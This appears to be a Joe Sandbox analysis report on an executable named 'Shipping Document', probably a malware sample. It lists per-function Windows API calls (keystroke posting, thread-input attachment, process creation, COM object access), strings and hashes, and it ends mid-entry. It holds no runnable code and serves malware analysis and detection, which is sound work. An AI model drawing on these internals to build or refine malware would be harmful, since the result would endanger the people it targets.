SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 010196F3

Strings

details, xrefs: 010196A1
smallicons, xrefs: 010196BB
largeicons, xrefs: 01019687
SHELLDLL_DefView, xrefs: 01019672
list, xrefs: 010196D5

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: bb128bd0978fb9c7f560f6d4e266953c457e5c7cc2a21af5da2c3281ff5f853d
Instruction ID: 89354ce76c998eaaaef2dedb314c77034008b3dc729f289e602e52c9555205f9
Opcode Fuzzy Hash: bb128bd0978fb9c7f560f6d4e266953c457e5c7cc2a21af5da2c3281ff5f853d
Instruction Fuzzy Hash: 74115C7A648313BAF611252ADC2FDA677DC9B09378F10001AF940E5096FE6E6500C768

Function 01038BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01038BEC
CoInitialize.OLE32(00000000), ref: 01038C19
CoUninitialize.OLE32 ref: 01038C23
GetRunningObjectTable.OLE32(00000000,?), ref: 01038D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 01038E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01052C0C), ref: 01038E84
CoGetObject.OLE32(?,00000000,01052C0C,?), ref: 01038EA7
SetErrorMode.KERNEL32(00000000), ref: 01038EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01038F3A
VariantClear.OLEAUT32(?), ref: 01038F4A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 340284ef5ca951b3c6131b7dd5b1f6664c2f4b8040994c57d03563af2b51e843
Instruction ID: d52d11481a64b3f29c42682d7a51293d5b78fed81184917cb0088db4f7145dda
Opcode Fuzzy Hash: 340284ef5ca951b3c6131b7dd5b1f6664c2f4b8040994c57d03563af2b51e843
Instruction Fuzzy Hash: 37C127B1208306AFD700DF68C98496BBBE9FF89748F004A9DF5899B251DB71ED05CB52

Function 01024189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0102419D
__swprintf.LIBCMT ref: 010241AA

Part of subcall function 00FE38D8: __woutput_l.LIBCMT ref: 00FE3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 010241D4
LoadResource.KERNEL32(?,00000000), ref: 010241E0
LockResource.KERNEL32(00000000), ref: 010241ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0102420D
LoadResource.KERNEL32(?,00000000), ref: 0102421F
SizeofResource.KERNEL32(?,00000000), ref: 0102422E
LockResource.KERNEL32(?), ref: 0102423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0102429B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 81da1dfe2c8887e2a16802a900f455d20cd2eab0ba0b8642d5fdc2f396ea7abf
Instruction ID: fc1d51308d888d1a64518ad4705c25236c862e2939d8c013b7d9d45d59aeeb1d
Opcode Fuzzy Hash: 81da1dfe2c8887e2a16802a900f455d20cd2eab0ba0b8642d5fdc2f396ea7abf
Instruction Fuzzy Hash: 7C31C1B5A0122AAFDB219FA5DE88EBF7BACEF05301F044555F981D2140D779DA11CBB0

Function 010216DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 01021700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,01020778,?,00000001), ref: 01021714
GetWindowThreadProcessId.USER32(00000000), ref: 0102171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01020778,?,00000001), ref: 0102172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0102173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01020778,?,00000001), ref: 01021755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01020778,?,00000001), ref: 01021767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01020778,?,00000001), ref: 010217AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01020778,?,00000001), ref: 010217C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01020778,?,00000001), ref: 010217CC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 5ee7027b5ce8c50979c3025bdc274488fc8118ae256f74d074bc6cb70d871a35
Instruction ID: 55e9cf9bfd32eb2735a84342cdec4386219881c7a649c4706141f555e3d8243b
Opcode Fuzzy Hash: 5ee7027b5ce8c50979c3025bdc274488fc8118ae256f74d074bc6cb70d871a35
Instruction Fuzzy Hash: A331B475600614BBEB319F29D984B6E7BF9BB89711F204055F9C0C628AD7799940CB90

Function 00FCFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FCFC06
OleUninitialize.OLE32(?,00000000), ref: 00FCFCA5
UnregisterHotKey.USER32(?), ref: 00FCFDFC
DestroyWindow.USER32(?), ref: 01004A00
FreeLibrary.KERNEL32(?), ref: 01004A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 01004A92

Strings

close all, xrefs: 00FCFC01

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 3aeff553afe28915e030095c0d30327da908938913d8938afc716fc3f6df859e
Instruction ID: 446da47fa6da12458685a4e63c76fdd7f1de48b163972a118f8a54300e14234a
Opcode Fuzzy Hash: 3aeff553afe28915e030095c0d30327da908938913d8938afc716fc3f6df859e
Instruction Fuzzy Hash: 5CA1CD317012138FDB2AEF14CA95F69F7A1BF04700F1442ADE94AAB292CB34AD56DF54

Function 0101A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0101AA64), ref: 0101A9A2

Strings

TEXT, xrefs: 0101A8D9
CLASSNN, xrefs: 0101A744
NAME, xrefs: 0101A7D4
INSTANCE, xrefs: 0101A8B0
REGEXPCLASS, xrefs: 0101A767
CLASS, xrefs: 0101A721

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 0215038d09b370ca31335d275327de10829f527c29a81b83b3f9178be62ad8ec
Instruction ID: 2043d53cada96c10b37b45fdc4c39e621ca4b5d43cf6d52f2281d43233ca77b5
Opcode Fuzzy Hash: 0215038d09b370ca31335d275327de10829f527c29a81b83b3f9178be62ad8ec
Instruction Fuzzy Hash: F491A230A01687EBDB58EF64C881BEDFBB5BF04314F008159D9CAA7145DF386A99DB90

Function 00FC2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00FC2EAE

Part of subcall function 00FC1DB3: GetClientRect.USER32(?,?), ref: 00FC1DDC
Part of subcall function 00FC1DB3: GetWindowRect.USER32(?,?), ref: 00FC1E1D
Part of subcall function 00FC1DB3: ScreenToClient.USER32(?,?), ref: 00FC1E45

GetDC.USER32 ref: 00FFCF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FFCF95
SelectObject.GDI32(00000000,00000000), ref: 00FFCFA3
SelectObject.GDI32(00000000,00000000), ref: 00FFCFB8
ReleaseDC.USER32(?,00000000), ref: 00FFCFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FFD04B

Strings

U, xrefs: 00FFCF20

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 785be575d9860315501aa33e2aff1377a363d9ac24e23a9c79ca01a62703c4c1
Instruction ID: 595ffe933c7277aace115b234fd4c795e1c6e498151137c704106655649370cd
Opcode Fuzzy Hash: 785be575d9860315501aa33e2aff1377a363d9ac24e23a9c79ca01a62703c4c1
Instruction Fuzzy Hash: CE71D77180020EDFCF219F64C985BBA7BB6FF49360F144269EE959A1A9C7358C41FB60

Function 0104C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

Part of subcall function 00FC2344: GetCursorPos.USER32(?), ref: 00FC2357
Part of subcall function 00FC2344: ScreenToClient.USER32(010867B0,?), ref: 00FC2374
Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000001), ref: 00FC2399
Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000002), ref: 00FC23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0104C2E4
ImageList_EndDrag.COMCTL32 ref: 0104C2EA
ReleaseCapture.USER32 ref: 0104C2F0
SetWindowTextW.USER32(?,00000000), ref: 0104C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0104C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0104C48F

Strings

@GUI_DROPID, xrefs: 0104C3E1
@GUI_DRAGFILE, xrefs: 0104C424

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: f7fd43a183ab800a8f0edb65e9d4354d04775a5365c04989e00a5623d153079a
Instruction ID: d5e3ca9b30c0bd804530198ff6b8dfe830d0b7e38658d6267bd9dfe818491f2d
Opcode Fuzzy Hash: f7fd43a183ab800a8f0edb65e9d4354d04775a5365c04989e00a5623d153079a
Instruction Fuzzy Hash: 8751AEB4208306AFD710EF24CA96F6E7BE1FB88310F00452DF5D58B2A1DB7AA944DB51

Function 01038F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0104F910), ref: 0103903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0104F910), ref: 01039071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010391EB
SysFreeString.OLEAUT32(?), ref: 01039215

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: de5b004e0a63396dc9089a0f1307055ca1d982fdca3236f47bbeba11cac9a7af
Instruction ID: 9b250065ba37dd12edeb21b8778df0499a8627d4cd7090f7e9c89276ee3be56f
Opcode Fuzzy Hash: de5b004e0a63396dc9089a0f1307055ca1d982fdca3236f47bbeba11cac9a7af
Instruction Fuzzy Hash: 9FF14D75A00109EFDF14DF98C888EAEB7B9FF89318F108099F556AB251CB71AE45CB50

Function 0103F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0103F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0103FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0103FD90
CloseHandle.KERNEL32(?), ref: 0103FDBF
CloseHandle.KERNEL32(?), ref: 0103FE36

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 4cc9ef8d7932e8a58cb6ac03cc0a9f2777dc9931e9fe90976f45cd01ea297810
Instruction ID: ca9cc8ed1d3619a345700b387eb2a71871f220e71ca878d71529d5826c91a42a
Opcode Fuzzy Hash: 4cc9ef8d7932e8a58cb6ac03cc0a9f2777dc9931e9fe90976f45cd01ea297810
Instruction Fuzzy Hash: 25E1C0716043429FCB14EF28C985B6ABBE5AF84350F04845DF9DA8B2A2CB75DC45CB52

Function 01024F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010238D3,?), ref: 010248C7

Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010238D3,?), ref: 010248E0

Part of subcall function 01024CD3: GetFileAttributesW.KERNEL32(?,01023947), ref: 01024CD4

lstrcmpiW.KERNEL32(?,?), ref: 01024FE2
_wcscmp.LIBCMT ref: 01024FFC
MoveFileW.KERNEL32(?,?), ref: 01025017

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: fc46d362a56b79e86d7176d56adf11e31cae33d627f4a8442fa4282258c18ac3
Instruction ID: b16bddbcacc5f4da88aea597ace4b6d3276e0dfdbd5a0692744813fd1cdf85da
Opcode Fuzzy Hash: fc46d362a56b79e86d7176d56adf11e31cae33d627f4a8442fa4282258c18ac3
Instruction Fuzzy Hash: 555173B20083959BC764EB64DC85DDFB7ECAF84341F10492EF2C9D3151EE79A188876A

Function 010488B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0104896E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: eb54c13dbc352428e957a8988ec7546bbf8b667668430cccb9516e0dc6ab6497
Instruction ID: fdd1258a5d379f6b62818efd2dfaf62844fbba4f026ad00a95c84815c56dda23
Opcode Fuzzy Hash: eb54c13dbc352428e957a8988ec7546bbf8b667668430cccb9516e0dc6ab6497
Instruction Fuzzy Hash: 1C51D3B0500205BBFF349EA8DCC5B9D7BA4FB04310F108967F694E61D1CBB5A990CB81

Function 00FC2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FFC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FFC569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FFC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FFC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FFC5C0
DestroyIcon.USER32(00000000), ref: 00FFC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FFC5EC
DestroyIcon.USER32(?), ref: 00FFC5FB

Part of subcall function 0104A71E: DeleteObject.GDI32(00000000), ref: 0104A757

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 6c3ef8b1eeac22143ea1a322110b2620695ea7422588e77e1d8841c72e57591d
Instruction ID: 79717c661ef6cc9e0d53bab90e569baa839f3cf0004bb2b9aea3ce4b5edb87a1
Opcode Fuzzy Hash: 6c3ef8b1eeac22143ea1a322110b2620695ea7422588e77e1d8841c72e57591d
Instruction Fuzzy Hash: C7515A74A0020AAFDB24DF24CA46FAA37A5EF58360F140518F94697290DB75ED90EB90

Function 01019B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0101AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0101AE77
Part of subcall function 0101AE57: GetCurrentThreadId.KERNEL32 ref: 0101AE7E
Part of subcall function 0101AE57: AttachThreadInput.USER32(00000000,?,01019B65,?,00000001), ref: 0101AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 01019B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 01019B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 01019B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 01019B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01019BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01019BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 01019BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01019BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01019BDD

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a867404daa0c4c8f83f9f691239d52f26709895196546cc0ddb9f90d2a3adef6
Instruction ID: 0b8b06ac6d9fac8d6e4ed33df3a88409a1dcc1e22c380f2e344a3c9b95f71fd1
Opcode Fuzzy Hash: a867404daa0c4c8f83f9f691239d52f26709895196546cc0ddb9f90d2a3adef6
Instruction Fuzzy Hash: 1111E1B5A50219BFF6206B74DC89FAA3B6DEB4C795F100415F284AB094C9F75C10DBA4

Function 01018E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,01018A84,00000B00,?,?), ref: 01018E0C
HeapAlloc.KERNEL32(00000000,?,01018A84,00000B00,?,?), ref: 01018E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01018A84,00000B00,?,?), ref: 01018E28
GetCurrentProcess.KERNEL32(?,00000000,?,01018A84,00000B00,?,?), ref: 01018E30
DuplicateHandle.KERNEL32(00000000,?,01018A84,00000B00,?,?), ref: 01018E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,01018A84,00000B00,?,?), ref: 01018E43
GetCurrentProcess.KERNEL32(01018A84,00000000,?,01018A84,00000B00,?,?), ref: 01018E4B
DuplicateHandle.KERNEL32(00000000,?,01018A84,00000B00,?,?), ref: 01018E4E
CreateThread.KERNEL32(00000000,00000000,01018E74,00000000,00000000,00000000), ref: 01018E68

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 92df2292e70286867dd3ce00cbd5be44c9615afb89828029f29bc502ecb14473
